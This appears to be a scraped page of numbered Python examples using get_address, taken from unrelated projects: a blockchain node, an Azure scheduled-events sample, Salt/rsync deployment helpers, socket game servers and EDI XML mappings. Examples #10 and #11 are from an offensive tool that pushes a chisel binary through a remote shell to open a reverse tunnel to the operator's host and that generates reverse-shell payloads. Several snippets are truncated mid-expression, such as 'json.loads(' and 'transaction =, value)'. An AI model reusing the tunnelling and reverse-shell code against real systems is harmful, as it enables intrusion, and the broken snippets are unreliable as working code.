Beispiel #1
def post_transaction():
    Spread the transaction among the network. This request is done by the user of the blockchain.
    global blockchain
    data = json.loads(
    recipient = data['address']
    value = data['value']
    is_username = data['is_username']

    # check if the user is submitting transaction posting a username instead of address
    if is_username:
        response = requests.get(
            get_address(connector[0], connector[1]) + '/nodes/address/' +

        if response.status_code == 200:
            recipient = response.json()

            return "Invalid username", 409

    transaction =, value)

        for key, value in neighbors.items():
            node_destination = get_address(value[0], value[1])
   + '/transactions/update',

        return "Transaction was submitted", 201

        return "The transaction is invalid", 409
def main():
    Sample code for getting scheduled events.
    args = parse_args()
    headers = {'metadata':'true'}

    address = get_address(args.ip_address, args.use_registry, headers)

    print("Scheduled Events endpoint address = " + address)

    # Repeat until user terminates the script.
    while True:
        # Send a GET request for scheduled events and read the response.
        response = get_scheduled_events(address, headers)
        document = json.loads('utf-8'))
        events = document['Events']
        print('Scheduled Events Document:\n' + str(document))

        # Go through each event in the response and prompt user for approval.
        for event in events:
            print("Current Event:\n" + str(event))
            approved = input("Approve event? (y / n): ")
            if approved.lower() == 'y':
                data = {
                    "DocumentIncarnation": document["DocumentIncarnation"],
                    "StartRequests": [{
                        "EventId": event["EventId"]
                print("Approving with the following:\n" + str(data))

                # Send a POST request to expedite.
                post_scheduled_events(address, json.dumps(data), headers)
        input("Press Enter to continue.")
Beispiel #3
def rsync(src, dst):
    error = os.system(("rsync -e 'ssh -o StrictHostKeyChecking=no -i %s'" +
                       " -azLk %s/ ubuntu@%s:%s") %
                      (config.key_path, src, util.get_address(), dst))
    if not error:
        print "Rsynced successfuly."
    return error
Beispiel #4
def start_server():
    """ Inicializa o servidor e espera por conexões. Quando
    uma conexão é feita, cria uma nova thread específica
    para a nova conexão, dando início a uma nova partida.

    host = util.get_address()
    port = int(input('Insira a porta para conexão: '))

    # Cria o socket do servnameor, declarando a família do protocolo
    # através do parâmetro AF_INET, bem como o protocolo UDP,
    # através do parâmetro SOCKET_DGRAM.
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.bind((host, port))

    print('Servidor iniciado. Aguardando conexões...')
    print('Host: {}\t Porta: {}'.format(host, port))

    # Inicia a escuta por possíveis conexões
    while True:
        _, client = server.recvfrom(1024)
        print('{} conectado. Preparando novo sistema...'.format(client[0]))

Beispiel #5
def start_server():
    """ Inicializa o servidor e espera por conexões. Quando
    uma conexão é feita, cria uma nova thread específica
    para a nova conexão, dando início a uma nova partida.

    host = util.get_address()
    port = int(input('Porta: '))

    # Cria o socket do servnameor, declarando a família do protocolo
    # através do parâmetro AF_INET, bem como o protocolo TCP,
    # através do parâmetro SOCKET_STREAM.
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))

    # Define um limite de 5 conexões simultâneas esperando
    # na fila.

    print('Servidor iniciado. Aguardando conexões...')
    print('Host: {}\t Porta: {}'.format(host, port))

    # Inicia a escuta por possíveis conexões
    while True:
        conn, client = server.accept()
        print('{} conectado. Preparando novo jogo...'.format(client[0]))
        threading.Thread(target=prepare_game, args=(conn, )).start()
def rsync(src, dst):
    error = os.system(("rsync -e 'ssh -o StrictHostKeyChecking=no -i %s'"
                       + " -azLk %s/ ubuntu@%s:%s")
                      % (config.key_path,
    if not error:
        print "Rsynced successfuly."
    return error
Beispiel #7
def upload_cloudmaster_minion_config():
    address = util.get_address()
    do_id, do_key = util.read_do_credential()
        (r"""(echo "master: salt" """ + r""" && echo "grains:" """ +
         r""" && echo "    aws_region: %s " """ +
         r""" && echo "    aws_ami: %s " """ +
         r""" && echo "    do_id: %s " """ + r""" && echo "    do_key: %s " """
         + r""" && echo "    do_region: %s " """ +
         r""" && echo "    controller: %s " """ +
         r""" ) > /home/ubuntu/minion""") %
        (config.aws_region, region.get_ami(), do_id, do_key, config.do_region,
    util.ssh_cloudmaster('sudo mv /home/ubuntu/minion /etc/salt/minion'
                         ' && sudo chown root:root /etc/salt/minion'
                         ' && sudo chmod 600 /etc/salt/minion')
Beispiel #8
def get_updated():
    Checks if somebody in the peers has a better blockchain
    global blockchain
    best_blockchain = blockchain
    for key, value in neighbors.items():
        node_destination = get_address(value[0], value[1])
        response = requests.get(node_destination + '/blockchain/get')

        if response.status_code == 200:
            peer_blockchain = Blockchain(response.json())

            if peer_blockchain.check_blockchain(
            ) and peer_blockchain.size() > best_blockchain.size():
                best_blockchain = peer_blockchain
def upload_cloudmaster_minion_config():
    address = util.get_address()
    do_id, do_key = util.read_do_credential()
    util.ssh_cloudmaster((r"""(echo "master: salt" """
                          + r""" && echo "grains:" """
                          + r""" && echo "    aws_region: %s " """
                          + r""" && echo "    aws_ami: %s " """
                          + r""" && echo "    do_id: %s " """
                          + r""" && echo "    do_key: %s " """
                          + r""" && echo "    do_region: %s " """
                          + r""" && echo "    controller: %s " """
                          + r""" ) > /home/ubuntu/minion""")
                         % (config.aws_region,
    util.ssh_cloudmaster('sudo mv /home/ubuntu/minion /etc/salt/minion'
                         ' && sudo chown root:root /etc/salt/minion'
                         ' && sudo chmod 600 /etc/salt/minion')
Beispiel #10
def create_tunnel(shell, ports: list):
    if len(ports) == 0:
        print("[-] Need at least one port to tunnel")
    # TODO: ports

    if isinstance(shell, ShellListener):
        # TODO: if chisel has not been transmitted yet
        # we need a exec sync function, but this requires guessing when the output ended or we need to know the shell prompt
        ipAddress = util.get_address()
        chiselPort = 3000
        chisel_path = os.path.join(os.path.dirname(__file__), "chisel64")
        shell.write_file("/tmp/chisel64", open(chisel_path, "rb"))
        shell.sendline("chmod +x /tmp/chisel64")

        t = threading.Thread(target=os.system, args=(f"{chisel_path} server --port {chisel_port} --reverse", ))

        shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
    elif isinstance(shell, paramiko.SSHClient):
        # TODO:
Beispiel #11
        shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
    elif isinstance(shell, paramiko.SSHClient):
        # TODO:

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print("Usage: %s <type> [port]" % sys.argv[0])

    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
    payload_type = sys.argv[1].lower()

    local_address = util.get_address()

    # choose random port
    if listen_port is None:
        listen_port = random.randint(10000,65535)
        while util.isPortInUse(listen_port):
            listen_port = random.randint(10000,65535)

    payload = generate_payload(payload_type, local_address, listen_port)

    if payload is None:
        print("Unknown payload type: %s" % payload_type)
        print("Supported types: bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm, powershell")

    tty = "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
def main(inn, out):
    data = parse_dsv_xml(inn.root, SCHEMA)
    data = simplify_dsv_xml(data)

    for BODY in data["WOC"]:
        lout = out.putloop({"BOTSID": "orderconf"})

        rec_counts = {}

        # == HEADER - WOC00R ==
        for HEAD in BODY.get("WOC00R", []):
            rec_counts["00"] = rec_counts.setdefault("00", 0) + 1
            if rec_counts["00"] > 1:
                continue  # We only want one record at most
            HEAD_ID = HEAD.get("Principal-ID")
            HEAD_ID2 = HEAD.get("File-ID")
            HEAD_DATE = HEAD.get("Message_date")
            HEAD_TIME = HEAD.get("Message_time")
            HEAD_DATETIME = get_datetime(HEAD_DATE, HEAD_TIME)
            HEAD_FROM = HEAD.get("Principal_off_code")
            HEAD_TO = None
            HEAD_TEST = HEAD.get("Test_indicator")

            HEAD_STATE = HEAD.get("Message_type")
            HEAD_TYPE = HEAD.get("Message_type-ID")

            out.ta_info["frompartner"] = HEAD_FROM
            out.ta_info["topartner"] = HEAD_TO
            out.ta_info["testindicator"] = HEAD_TEST == "1"

            lout.put({"BOTSID": "orderconf"}, {"BOTSID": "header", "msg_id": HEAD_ID})
            lout.put({"BOTSID": "orderconf"}, {"BOTSID": "header", "msg_id2": HEAD_ID2})
            lout.put({"BOTSID": "orderconf"}, {"BOTSID": "header", "datetime": HEAD_DATETIME})
            lout.put({"BOTSID": "orderconf"}, {"BOTSID": "header", "state": HEAD_STATE})
            lout.put({"BOTSID": "orderconf"}, {"BOTSID": "header", "type": HEAD_TYPE})
            lout.put({"BOTSID": "orderconf"}, {"BOTSID": "header", "test": out.ta_info["testindicator"]})

        # == ORDER - WOC50R ==
        for ORD in BODY.get("WOC50R", []):
            rec_counts["50"] = rec_counts.setdefault("50", 0) + 1

            ORD_ID = ORD.get("Order_reference")
            ORD_NAME = ORD.get("Message_reference")
            ORD_DESC = ORD.get("Order_remarks")
            ORD_MANIFEST = ORD.get("Voyage_id")
            ORD_SHIP_DATE = get_datetime(ORD.get("Shipped_on_this_date"), "0000")
            ORD_DELIVERY_DATE = ORD.get("Delivery_date")
            ORD_DELIVERY_DATE_TYPE = {"O": "ondate", "D": "fromdate"}.get(ORD.get("Code_delivery_date", "F"))
            ORD_TYPE = {"I": "in", "O": "out", "C": "customs", "T": "skuchange", "X": "direct"}.get(
            ORD_REASON = {
                "B": "backorder",
                "C": "correction",
                "G": "refuse",
                "H": "return",
                "N": "normal",
                "S": "companytransfer",
            }.get(ORD.get("Order_category", "N"))
            ORD_SERVICE_OUT = ORD.get("Ext_forw_service")
            ORD_CARRIER_CODE = ORD.get("Carrier_code")
            ORD_CONFIRMED = ORD.get("Indicator_Order_Executed")
            ORD_INVOICE_NAME = ORD.get("Invoice_number")
            ORD_INVOICE_CURRENCY = ORD.get("Currency_of_order")
            ORD_INVOICE_PAYTERM = ORD.get("Payment_term")
            ORD_B2_TYPE = {"B": "B2B", "C": "B2C"}.get(ORD.get("Sales_Channel"))

            oout = lout.putloop({"BOTSID": "orderconf"}, {"BOTSID": "shipment"})
            oout.put({"BOTSID": "shipment", "id": ORD_ID})
            oout.put({"BOTSID": "shipment", "name": ORD_NAME})
            oout.put({"BOTSID": "shipment", "desc": ORD_DESC})
            oout.put({"BOTSID": "shipment", "manifest": ORD_MANIFEST})
            oout.put({"BOTSID": "shipment", "date_ship": ORD_SHIP_DATE})
            oout.put({"BOTSID": "shipment", "date_delivery": ORD_DELIVERY_DATE})
            oout.put({"BOTSID": "shipment", "date_delivery_type": ORD_DELIVERY_DATE_TYPE})
            oout.put({"BOTSID": "shipment", "type": ORD_TYPE})
            oout.put({"BOTSID": "shipment", "reason": ORD_REASON})
            oout.put({"BOTSID": "shipment", "service": ORD_SERVICE_OUT})
            oout.put({"BOTSID": "shipment", "carrier": ORD_CARRIER_CODE})
            oout.put({"BOTSID": "shipment", "confirmed": ORD_CONFIRMED})
            oout.put({"BOTSID": "shipment", "buisness_type": ORD_B2_TYPE})
            oout.put({"BOTSID": "shipment"}, {"BOTSID": "invoice", "name": ORD_INVOICE_NAME})
            oout.put({"BOTSID": "shipment"}, {"BOTSID": "invoice", "currency": ORD_INVOICE_CURRENCY})
            oout.put({"BOTSID": "shipment"}, {"BOTSID": "invoice", "payment_term": ORD_INVOICE_PAYTERM})

            # == ORDER REFERENCES - WOC51R ==
            for ORDID in ORD.get("WOC51R", []):
                rec_counts["51"] = rec_counts.setdefault("51", 0) + 1

                ORDID_ID = ORDID.get("Reference_number")
                ORDID_DESC = ORDID.get("Free_form_descr")
                ORDID_TYPE = {
                    "EPF": "invoice",
                    "CON": "consignment",
                    "ABO": "orig_ref",
                    "PO": "purchase_ref",
                    "SI": "shipping_ref",
                    "SO": "sale_ref",
                ORDID_DATE = ORDID.get("Date")
                ORDID_TIME = ORDID.get("Time")
                ORDID_DATEIMTE = get_datetime(ORDID_DATE, ORDID_TIME)

                oidout = oout.putloop({"BOTSID": "shipment"}, {"BOTSID": "references"})
                oidout.put({"BOTSID": "references", "id": ORDID_ID})
                oidout.put({"BOTSID": "references", "desc": ORDID_DESC})
                oidout.put({"BOTSID": "references", "type": ORDID_TYPE})
                oidout.put({"BOTSID": "references", "datetime": ORDID_DATEIMTE})

            # == ORDER VALUES - WOC52R ==
            for ORDVAL in ORD.get("WOC52R", []):
                rec_counts["52"] = rec_counts.setdefault("52", 0) + 1

                ORDVAL_CURRENCY = ORDVAL.get("Currency_code")
                ORDID_TOTAL = ORDVAL.get("Order_total")
                ORDVAL_TYPE = {
                    "CTN": "uoms",
                    "PLT": "pallets",
                    "GRW": "gross_grammes",
                    "NTW": "net_grammes",
                    "MTQ": "gross_cbm",
                    "IN": "invoice",
                    "F01": "proforma_exvat",

                ovalout = oout.putloop({"BOTSID": "shipment"}, {"BOTSID": "values"})
                ovalout.put({"BOTSID": "values", "type": ORDVAL_TYPE})
                ovalout.put({"BOTSID": "values", "total": ORDID_TOTAL})
                ovalout.put({"BOTSID": "values", "currency": ORDVAL_CURRENCY})

            # == PAL DETAILS - WOC54R ==
            for ORDLD in ORD.get("WOC54R", []):
                rec_counts["54"] = rec_counts.setdefault("54", 0) + 1
                # FIXME: Unused but count for validation

            # == BOX DETAILS - WOC56R ==
            for ORDLD in ORD.get("WOC56R", []):
                rec_counts["56"] = rec_counts.setdefault("56", 0) + 1
                # FIXME: Unused but count for validation

            # == SERVICE DETAILS - WOC59R ==
            for ORDLD in ORD.get("WOC59R", []):
                rec_counts["59"] = rec_counts.setdefault("59", 0) + 1

                CARRIER_TYPE = {
                    "A": "Allport",
                    "B": "DPD",
                    "C": "Coca Cola",
                    "D": "Dachser",
                    "E": "Exel",
                    "F": "Dufa transport",
                    "G": "Graveleau",
                    "H": "DHL",
                    "I": "Chronopost",
                    "J": "XP France",
                    "K": "Selektvracht",
                    "L": "Distrilogistics",
                    "M": "DSV (Frans Maas)",
                    "N": "Normal",
                    "O": "DSV",
                    "P": "TPG",
                    "Q": "Mory",
                    "R": "Nunner",
                    "S": "Sernam",
                    "T": "TNT",
                    "U": "UPS",
                    "V": "van Gend & Loos",
                    "W": "MIT Transport",
                    "X": "Fedex",
                    "Y": "New Poney Express",
                    "Z": "CORPCO",
                    "1": "DSV Road",
                    "2": "CIBLEX",
                    "3": "Trans-o-Flex",
                    "4": "AZKAR",
                    "5": "NightFreight",
                    "6": "GLS",
                    "7": "Bosman",
                    "8": "XPACK",
                    "9": "Ship It Smarter",
                    "(": "GEPC Intercompany",
                    ")": "DynaLogic",
                    "-": "DB Schenker",
                SERVICE_LEVEL_CODE = ORDLD.get("Service_Level_Code")
                CONSIGNMENT_NUMBER = ORDLD.get("Consignment_number")
                SERVICE_LEVEL_DESC = ORDLD.get("Service_Level_Description")
                SERVICE_LEVEL_LABEL = ORDLD.get("Service_Level_Description_Label")
                SERVICE_LEVEL_TEXT = ORDLD.get("Service_Level_Description_Text")
                SERVICE_IND_1 = ORDLD.get("Service_Indicator_01") or ""
                SERVICE_IND_2 = ORDLD.get("Service_Indicator_02") or ""
                SERVICE_IND_3 = ORDLD.get("Service_Indicator_03") or ""
                LEAD_TRACKING_NUMBER = ORDLD.get("Lead_package_tracking_number")

                oout.put({"BOTSID": "shipment", "service_carrier": CARRIER_TYPE})
                oout.put({"BOTSID": "shipment", "service_level_code": SERVICE_LEVEL_CODE})
                oout.put({"BOTSID": "shipment", "service_level_desc": SERVICE_LEVEL_DESC})
                oout.put({"BOTSID": "shipment", "service_level_label": SERVICE_LEVEL_LABEL})
                oout.put({"BOTSID": "shipment", "service_level_text": SERVICE_LEVEL_TEXT})
                        "BOTSID": "shipment",
                        "service_indicators": "%s,%s,%s" % (SERVICE_IND_1, SERVICE_IND_2, SERVICE_IND_3),
                oout.put({"BOTSID": "shipment", "consignment_number": LEAD_TRACKING_NUMBER})
                oout.put({"BOTSID": "shipment", "tracking_number": LEAD_TRACKING_NUMBER})

            # == PARTNER REFERENCE - WOC70R ==
            for PART in ORD.get("WOC70R", []):
                rec_counts["70"] = rec_counts.setdefault("70", 0) + 1
                for PART_ADD in PART.get("WOC72R", []):
                    rec_counts["72"] = rec_counts.setdefault("72", 0) + 1
                PART_ADD = PART.get("WOC72R", [{}])[0]

                PART_PARTNER_ID = PART.get("Party_external_reference")
                PART_ADD_NAME = PART_ADD.get("Company_name_1")
                PART_ADD_NAME2 = PART_ADD.get("Company_name_2")
                if PART_ADD_NAME2:
                    PART_ADD_NAME = PART_ADD_NAME + ", " + PART_ADD_NAME2
                PART_ADD_LINE1, PART_ADD_LINE2, PART_ADD_LINE3 = get_address(
                PART_ADD_ZIP = PART_ADD.get("Postal_code")
                PART_ADD_STATE = PART_ADD.get("Place_name")
                PART_ADD_COUNTRY = PART_ADD.get("Country_code")
                PART_ADD_PHONE = PART_ADD.get("Telephone_number")
                PART_ADD_FAX = PART_ADD.get("Telefax_number")
                PART_ADD_VAT = PART_ADD.get("VAT-number")

                partout = oout.putloop({"BOTSID": "shipment"}, {"BOTSID": "partner"})
                partout.put({"BOTSID": "partner", "id": PART_PARTNER_ID})
                partout.put({"BOTSID": "partner", "name": PART_ADD_NAME})
                partout.put({"BOTSID": "partner", "street1": PART_ADD_LINE1})
                partout.put({"BOTSID": "partner", "street2": PART_ADD_LINE2})
                partout.put({"BOTSID": "partner", "city": PART_ADD_LINE3})
                partout.put({"BOTSID": "partner", "state": PART_ADD_STATE})
                partout.put({"BOTSID": "partner", "country": PART_ADD_COUNTRY})
                partout.put({"BOTSID": "partner", "zip": PART_ADD_ZIP})
                partout.put({"BOTSID": "partner", "phone": PART_ADD_PHONE})
                partout.put({"BOTSID": "partner", "fax": PART_ADD_VAT})
                partout.put({"BOTSID": "partner", "vat": PART_ADD_VAT})

            # == ORDER LINES - WOC80R ==
            for ORDL in ORD.get("WOC80R", []):
                rec_counts["80"] = rec_counts.setdefault("80", 0) + 1

                ORDL_DATE = HEAD.get("Date_executed")
                ORDL_TIME = HEAD.get("Time_executed")
                ORDL_PICK_DATE = HEAD.get("Picking_date")
                ORDL_PICK_TIME = HEAD.get("Picking_time")
                # take the one that is more precise with the picking time having precedence
                if ORDL_PICK_DATE and ORDL_PICK_TIME:
                    ORDL_DATETIME = get_datetime(ORDL_PICK_DATE, ORDL_PICK_TIME)
                elif ORDL_DATE and ORDL_TIME:
                    ORDL_DATETIME = get_datetime(ORDL_DATE, ORDL_TIME)
                    ORDL_DATETIME = get_datetime(ORDL_PICK_DATE, ORDL_PICK_TIME) or get_datetime(ORDL_DATE, ORDL_TIME)

                ORDL_ID = ORDL.get("Orderline_reference")
                ORDL_SEQ = ORDL.get("FL_order_line_nr")
                ORDL_TYPE = {"I": "in", "O": "out"}.get(ORDL.get("Orderline-type"))
                ORDL_PRODUCT = ORDL.get("SKU-reference")
                ORDL_QTY_UOM = ORDL.get("Quantity")
                ORDL_UOM = ORDL.get("Unit_of_Measure")
                ORDL_QTY_REAL = ORDL.get("Packages") or ORDL.get("Units_MUS")
                ORDL_QTY_EXPECTED = ORDL.get("Original_packages") or ORDL.get("Original_MUS")

                olout = oout.putloop({"BOTSID": "shipment"}, {"BOTSID": "line"})
                olout.put({"BOTSID": "line", "id": ORDL_ID})
                olout.put({"BOTSID": "line", "seq": ORDL_SEQ})
                olout.put({"BOTSID": "line", "type": ORDL_TYPE})
                olout.put({"BOTSID": "line", "datetime": ORDL_DATETIME})
                olout.put({"BOTSID": "line", "product": ORDL_PRODUCT})
                olout.put({"BOTSID": "line", "uom_qty": ORDL_QTY_UOM})
                olout.put({"BOTSID": "line", "uom": ORDL_UOM})
                olout.put({"BOTSID": "line", "qty_real": ORDL_QTY_REAL})
                olout.put({"BOTSID": "line", "qty_expected": ORDL_QTY_EXPECTED})

                # == ORDER LINE REFERENCES - WOC81R ==
                for ORDLID in ORDL.get("WOC81R", []):
                    rec_counts["81"] = rec_counts.setdefault("81", 0) + 1

                    ORDLID_ID = ORDLID.get("Reference_number")
                    ORDLID_DESC = ORDLID.get("Free_form_descr")
                    ORDLID_TYPE = {
                        "EPF": "invoice",
                        "CON": "consignment",
                        "ABO": "orig_ref",
                        "PO": "purchase_ref",
                        "SI": "shipping_ref",
                        "SO": "sale_ref",
                        "BAT": "batch_seq",
                        "PBI": "pick_batch",
                        "SO": "pick_seq",
                        "SO": "kit",

                    oidout = olout.putloop({"BOTSID": "line"}, {"BOTSID": "references"})
                    oidout.put({"BOTSID": "references", "id": ORDLID_ID})
                    oidout.put({"BOTSID": "references", "desc": ORDLID_DESC})
                    oidout.put({"BOTSID": "references", "type": ORDLID_TYPE})

                # == ORDER LINE DETAILS - WOC83R ==
                for ORDLD in ORDL.get("WOC83R", []):
                    rec_counts["83"] = rec_counts.setdefault("83", 0) + 1
                    # FIXME: Unused but count for validation

                # == ORDER LINE DETAILS - WOC85R ==
                for ORDLD in ORDL.get("WOC85R", []):
                    rec_counts["85"] = rec_counts.setdefault("85", 0) + 1
                    # FIXME: Unused but count for validation

        for FOOT in BODY.get("WOC99R", []):
            rec_counts["99"] = rec_counts.setdefault("99", 0) + 1

        for FOOT in BODY.get("WOC99R", []):
            FOOT_REC_TYPE = FOOT.get("RecordType")
            FOOT_REC_COUNT = FOOT.get("Total_Nbrs_of_Rec")
            assert int(rec_counts.get(FOOT_REC_TYPE, 0)) == int(FOOT_REC_COUNT), "Expected %s of record %s, got %s" % (
                rec_counts.get(FOOT_REC_TYPE, 0),

Beispiel #13
def main(inn, out):
    data = parse_dsv_xml(inn.root, SCHEMA)
    data = simplify_dsv_xml(data)

    for BODY in data['SR']:
        lout = out.putloop({'BOTSID': 'inventory'})

        rec_counts = {}

        # == HEADER - SR00R ==
        for HEAD in BODY.get('SR00R', []):
            rec_counts['00'] = rec_counts.setdefault('00', 0) + 1
            if rec_counts['00'] > 1:
                continue  # We only want one record at most
            HEAD_ID = HEAD.get('Message_Identification')
            HEAD_DATE = HEAD.get('Message_date')
            HEAD_TIME = HEAD.get('Message_time')
            HEAD_DATETIME = get_datetime(HEAD_DATE, HEAD_TIME)
            HEAD_FROM = HEAD.get('Sender_Identification')
            HEAD_TO = None

            out.ta_info['frompartner'] = HEAD_FROM
            out.ta_info['topartner'] = HEAD_TO

            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'header',
                'msg_id': HEAD_ID
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'header',
                'datetime': HEAD_DATETIME
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'header',
                'partner_name': HEAD_FROM

        # == WAREHOUSE REFERENCE - SR70R ==
        for WH in BODY.get('SR70R', []):
            rec_counts['70'] = rec_counts.setdefault('70', 0) + 1
            if rec_counts['70'] > 1:
                continue  # We only want one record at most

            for WH_ADD in WH.get('SR72R', []):
                rec_counts['72'] = rec_counts.setdefault('72', 0) + 1

            WH_ADD = WH.get('SR72R', [{}])[0]

            WH_PARTNER_ID = WH.get('Party_external_reference')
            WH_ADD_NAME = WH_ADD.get('Company_name_1')
            WH_ADD_NAME2 = WH_ADD.get('Company_name_2')
            if WH_ADD_NAME2:
                WH_ADD_NAME = WH_ADD_NAME + ", " + WH_ADD_NAME2
            WH_ADD_LINE1, WH_ADD_LINE2, WH_ADD_LINE3 = get_address(
                WH_ADD.get('House_number_extension'), WH_ADD.get('Address_1'),
                WH_ADD.get('Address_2'), WH_ADD.get('Address_3'),
            WH_ADD_ZIP = WH_ADD.get('Postal_code')
            WH_ADD_STATE = WH_ADD.get('Place_name')
            WH_ADD_COUNTRY = WH_ADD.get('Country_code')
            WH_ADD_PHONE = WH_ADD.get('Telephone_number')
            WH_ADD_FAX = WH_ADD.get('Telefax_number')
            WH_ADD_VAT = WH_ADD.get('VAT-number')

            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'id': WH_PARTNER_ID
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'name': WH_ADD_NAME
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'street1': WH_ADD_LINE1
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'street2': WH_ADD_LINE2
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'city': WH_ADD_LINE3
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'state': WH_ADD_STATE
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'country': WH_ADD_COUNTRY
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'zip': WH_ADD_ZIP
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'phone': WH_ADD_PHONE
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'fax': WH_ADD_FAX
            lout.put({'BOTSID': 'inventory'}, {
                'BOTSID': 'partner',
                'vat': WH_ADD_VAT

        # == STOCK LEVELS - SR8AR ==
        for SL in BODY.get('SR8AR', []):
            rec_counts['8A'] = rec_counts.setdefault('8A', 0) + 1
            SL_PRODUCT = SL.get('Lot_external_reference')
            SL_PRODUCT_ARTICLE = SL.get('Article_reference')
            SL_PRODUCT_CODE = SL.get('Product_code')
            SL_PRODUCT_CODE_TYPE = SL.get('Product_code_qualifier')
            SL_QTY_TOTAL = SL.get('Number_of_units_physical_stock_in_MUS')
            SL_QTY_INCOMING = SL.get('Expected_in')
            SL_QTY_AVAILABLE = SL.get('Physical_stock_available')
            SL_QTY_OUTGOING = SL.get('Expected_out')
            SL_QTY_OUTGOING_AVAILABLE = SL.get('Reserved_sufficient')
            SL_QTY_OUTGOING_FUTURE = SL.get('Reserved_insufficient')
            SL_DATE = SL.get('Date_the_stock_was_determined')
            SL_TIME = SL.get('Time_the_stock_was_determined')
            SL_DATETIME = get_datetime(SL_DATE, SL_TIME)

            sout = lout.putloop({'BOTSID': 'inventory'},
                                {'BOTSID': 'inventory_line'})
            sout.put({'BOTSID': 'inventory_line', 'product': SL_PRODUCT})
                'BOTSID': 'inventory_line',
                'product_article_no': SL_PRODUCT_ARTICLE
                'BOTSID': 'inventory_line',
                'product_other': SL_PRODUCT_CODE
                'BOTSID': 'inventory_line',
                'product_other_type': SL_PRODUCT_CODE_TYPE
            #sout.put({'BOTSID':'inventory_line', 'qty_total': SL_QTY_TOTAL}) # This may be in a different UoM from DSV, so do not include it since the other qty fields are mandatory
                'BOTSID': 'inventory_line',
                'qty_incoming': SL_QTY_INCOMING
                'BOTSID': 'inventory_line',
                'qty_available': SL_QTY_AVAILABLE
                'BOTSID': 'inventory_line',
                'qty_outgoing': SL_QTY_OUTGOING
                'BOTSID': 'inventory_line',
                'qty_outgoing_available': SL_QTY_OUTGOING_AVAILABLE
                'BOTSID': 'inventory_line',
                'qty_outgoing_future': SL_QTY_OUTGOING_FUTURE
            sout.put({'BOTSID': 'inventory_line', 'datetime': SL_DATETIME})

        # == FOOTER - SR99R ==
        for FOOT in BODY.get('SR99R', []):
            rec_counts['99'] = rec_counts.setdefault('99', 0) + 1

        for FOOT in BODY.get('SR99R', []):
            FOOT_REC_TYPE = FOOT.get('RecordType')
            FOOT_REC_COUNT = FOOT.get('Total_Nbrs_of_Rec')
            assert int(rec_counts.get(FOOT_REC_TYPE, 0)) == int(
                FOOT_REC_COUNT), "Expected %s of record %s, got %s" % (
                    FOOT_REC_COUNT, FOOT_REC_TYPE,
                    rec_counts.get(FOOT_REC_TYPE, 0))

def main(inn,out):
    data = parse_dsv_xml(inn.root, SCHEMA)
    data = simplify_dsv_xml(data)

    for BODY in data['SR']:
        lout = out.putloop({'BOTSID':'inventory'})

        rec_counts = {}

        # == HEADER - SR00R ==
        for HEAD in BODY.get('SR00R', []):
            rec_counts['00'] = rec_counts.setdefault('00', 0) + 1
            if rec_counts['00'] > 1:
                continue # We only want one record at most
            HEAD_ID = HEAD.get('Message_Identification')
            HEAD_DATE = HEAD.get('Message_date')
            HEAD_TIME = HEAD.get('Message_time')
            HEAD_DATETIME = get_datetime(HEAD_DATE, HEAD_TIME)
            HEAD_FROM = HEAD.get('Sender_Identification')
            HEAD_TO = None

            out.ta_info['frompartner'] = HEAD_FROM
            out.ta_info['topartner'] = HEAD_TO

            lout.put({'BOTSID':'inventory'},{'BOTSID':'header', 'msg_id': HEAD_ID})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'header', 'datetime': HEAD_DATETIME})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'header', 'partner_name': HEAD_FROM})

        # == WAREHOUSE REFERENCE - SR70R ==
        for WH in BODY.get('SR70R', []):
            rec_counts['70'] = rec_counts.setdefault('70', 0) + 1
            if rec_counts['70'] > 1:
                continue # We only want one record at most

            for WH_ADD in WH.get('SR72R', []):
                rec_counts['72'] = rec_counts.setdefault('72', 0) + 1

            WH_ADD = WH.get('SR72R', [{}])[0]

            WH_PARTNER_ID = WH.get('Party_external_reference')
            WH_ADD_NAME = WH_ADD.get('Company_name_1')
            WH_ADD_NAME2 = WH_ADD.get('Company_name_2')
            if WH_ADD_NAME2:
                WH_ADD_NAME = WH_ADD_NAME + ", " + WH_ADD_NAME2
            WH_ADD_LINE1, WH_ADD_LINE2, WH_ADD_LINE3 = get_address(WH_ADD.get('House_number'), WH_ADD.get('House_number_extension'), WH_ADD.get('Address_1'), WH_ADD.get('Address_2'), WH_ADD.get('Address_3'), WH_ADD.get('Address_4'))
            WH_ADD_ZIP = WH_ADD.get('Postal_code')
            WH_ADD_STATE = WH_ADD.get('Place_name')
            WH_ADD_COUNTRY = WH_ADD.get('Country_code')
            WH_ADD_PHONE = WH_ADD.get('Telephone_number')
            WH_ADD_FAX = WH_ADD.get('Telefax_number')
            WH_ADD_VAT = WH_ADD.get('VAT-number')

            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'id': WH_PARTNER_ID})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'name': WH_ADD_NAME})
            lout.put({'BOTSID':'inventory'},{'BOTSID':'partner', 'street1': WH_ADD_LINE1})
